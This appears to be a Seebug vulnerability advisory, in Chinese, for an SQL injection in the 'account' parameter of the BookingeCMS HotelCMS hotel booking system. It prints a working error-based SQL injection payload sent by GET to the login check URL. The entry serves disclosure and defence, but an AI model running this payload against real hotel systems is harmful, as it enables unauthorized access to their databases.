BookingeCMS HotelCMS酒店预订管理系统account参数SQL注入

2015-12-07T00:00:00
ID SSV:90009
Type seebug
Reporter Root
Modified 2015-12-07T00:00:00

Description

0x01 漏洞简述

提交时间: 2015-09-04 13:33

公开时间: 2015-12-06 09:00

漏洞类型: SQL注射漏洞

珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=login.checkAccount&account= 文件account参数存在注入

0x02 漏洞利用

测试Payload: (get提交)

/?m=login.checkAccount&account=

/?m=login.checkAccount&account= ' AND (SELECT 9468 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uNGB'='uNGB

![](https://images.seebug.org/contribute/0fef91cd-c680-4d94-9729-6b847c91e3a2-2015-12-07 14_48_41.jpg)

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2010-0137378